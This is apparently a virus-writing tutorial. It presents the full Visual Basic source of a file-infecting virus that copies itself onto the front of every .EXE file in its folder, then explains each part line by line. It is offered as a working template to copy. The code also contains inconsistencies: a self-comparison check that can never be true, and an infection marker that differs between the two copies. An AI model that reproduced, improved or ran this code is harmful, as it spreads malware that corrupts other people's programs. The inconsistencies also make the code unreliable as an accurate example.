EXE Appenders
Now we get to the real thing... the EXE appending viruses. This is a simple not encrypted appending virus without any payload.
Click Here!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Cut here-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Option Explicit
Private victim As String
Private myarray() As Byte
Private varray As Byte
Private length As Long
Private chck As String
Const size As Integer = 18432
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Dim I As Long
Dim Free
Free = FreeFile
On Error GoTo Fin
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free
victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""
' If the victim file, has the same directory and name as the file
' that is running - skip the next part
If LCase(App.Path & "\" & App.EXEName & ".exe") _
<> LCase(App.Path & "\" & App.EXEName & ".exe") Then
Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free)) ' Sets buffer up for the file data
Get #1, 1, varray ' Copy th file data into a variable
Close #Free
chck = Mid(varray, Len(varray)) ' Store the last character in the
' victim file in CheckX
If LCase(chck) <> "^" Then ' if the character = X then the file has
' already been infected, if not continue
Open victim For Binary Access Write As #Free
Put #Free, 1, myarray ' Place our code in the front of the file
Put #Free, size, varray ' Follow it immediatley by the victims code
Put #Free, LOF(Free) + 1, "^" 'Place an X at the end to show it's been
'infected
Close #Free 'Thats how this virus got it's name!
End If
Else
End If
Victim = Dir() ' Find the next file to infect
Wend ' Go back to the start
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size) ' Store the length of the current file minus
' the virus file size in the variable
If Length > 0 Then ' if it's more than 0, the file is infected,
' if not, this is the raw virus file
myarray = Space(length) ' Create buffer in variable, for the size of
' the file
Get #Free, size, myarray ' Get the old host data from out of this file
Close #Free
Open App.Path & "\" & App.EXEName & ".tut" For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #Free
idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
' Run the old host code
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
' Get it running application code number
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE ' Wait untill the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop
On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut" ' Delete the old host code
Else
Close #Free
End If
End
Fin:
End Sub
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Cut here-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Now lets go over it part by part:
Option Explicit
Private victim As String
Private myrray() As Byte
Private varray As Byte
Private length As Long
Private chck As String
Const size As Integer = 18432
Here we define the variables that we will use, the " myarray() " variable holds tha binary code of the virus, the "victim" variable holds the victim file's name and the "mysize" variable holds the size of the virus. You will need to change the number to the size of your virus. The length variable holds the running file's length and the chck variable will be used to check if we have already infected the file.
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
These are the variables, constants and declarations that we will use for process checking.
Private Sub Form_Load()
On Error Resume Next
We open the sub we will use (Form_Load), and we put our error handle there.
Dim Free
Free = FreeFile
This is a good idea taken by the y2k virus. This will rid you of read/write errors because it will open free file.
On Error GoTo Fin
This is our error handler. If there is an error it will ignore all code and go to the Fin marker which is the end.
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free
Now we get the binary code out of our virus and we store it in " myarray " variable.
victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""
If LCase(App.Path & "\" & App.EXEName & ".exe") _
<> LCase(App.Path & "\" & App.EXEName & ".exe") Then
If our victim file is the same as the one running, same directory and same name, we do not infect.
Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free))
Get #1, 1, varray
Close #Free
We get the binary code from our victim file and store it in the varray variable.
chck = Mid(varray, Len(varray))
We store the last character of the victim file in the chck variable for later use of infection checking.
If LCase(chck) <> "t" Then
If the last character isn't " t " then it means that its not infected so continue.
Open victim For Binary Access Write As #Free
Put #Free, 1, myarray
Put #Free, size, varray
Put #Free, LOF(Free) + 1, "t"
Close #Free
End If
Else
End If
Now we write our virus code first and then the original file code in the file and we also include the "t" character to mark it as infected.
Victim = Dir()
Wend
This find the next file to infect and redoes the whole routine.
Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size)
If Length > 0 Then
myarray = Space(length)
Get #Free, size, myarray
Close #Free
Now we get the file's size minus the virus, if it isn't 0 it means that it is infected.
Open App.Path & "\" & App.EXEName & ".tut" _
For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #FreeClick Here!
We put the host data in a file we make. A temporary file.
idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Now we run the original host program.
Do While iExit = STILL_ACTIVE ' Wait untill the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Wait for the program to be terminated.
On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut" ' Delete the old host code
Else
End If
End
Fin:
End Sub